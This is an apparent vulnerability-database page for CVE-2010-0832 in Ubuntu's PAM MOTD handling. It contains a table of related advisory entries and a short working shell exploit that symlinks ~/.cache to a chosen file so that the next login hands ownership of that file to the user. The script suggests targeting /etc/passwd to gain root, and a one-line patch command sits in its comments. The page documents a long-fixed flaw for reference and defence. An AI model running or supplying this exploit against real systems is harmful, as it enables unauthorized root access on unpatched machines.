Ubuntu PAM MOTD File Tampering Privilege Escalation

🗓️ 08 Jul 2010 00:00:00Reported by Kristian HermansenType

packetstorm🔗 packetstormsecurity.com👁 53 Views

Ubuntu PAM MOTD File Tampering Privilege Escalation - Exploi

Reporter	Title	Published	Views	Family All 28
0day.today	Ubuntu PAM MOTD Local Root Exploit	12 Jul 201000:00	–	zdt
0day.today	Ubuntu PAM MOTD File Tampering (Privilege Escalation)	8 Jul 201000:00	–	zdt
Circl	CVE-2010-0832	8 Jul 201000:00	–	circl
CVE	CVE-2010-0832	12 Jul 201016:00	–	cve
Cvelist	CVE-2010-0832	12 Jul 201016:00	–	cvelist
Debian CVE	CVE-2010-0832	12 Jul 201016:00	–	debiancve
Exploit DB	Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)	8 Jul 201000:00	–	exploitdb
Exploit DB	Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)	12 Jul 201000:00	–	exploitdb
EUVD	EUVD-2010-0857	7 Oct 202500:30	–	euvd
exploitpack	Linux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (1)	8 Jul 201000:00	–	exploitpack

`#!/bin/sh  
#  
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)  
# Date: July 7, 2010  
# Author: Kristian Erik Hermansen <[email protected]>  
# Software Link: http://packages.ubuntu.com/  
# Version: pam-1.1.0  
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)  
# CVE : CVE-2010-0832  
#  
# Notes: Affects Ubuntu 9.10 and 10.04 LTS  
# [Patch Instructions]  
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i  
#  
  
if [ $# -eq 0 ]; then  
echo "Usage: $0 /path/to/file"  
exit 1  
fi  
  
mkdir $HOME/backup 2> /dev/null  
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)  
mv $HOME/.cache/ $tmpdir 2> /dev/null  
echo "\n@@@ File before tampering ...\n"  
ls -l $1  
ln -sf $1 $HOME/.cache  
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\n"  
  
`

08 Jul 2010 00:00Current

0.8Low risk

Vulners AI Score0.8

EPSS0.00135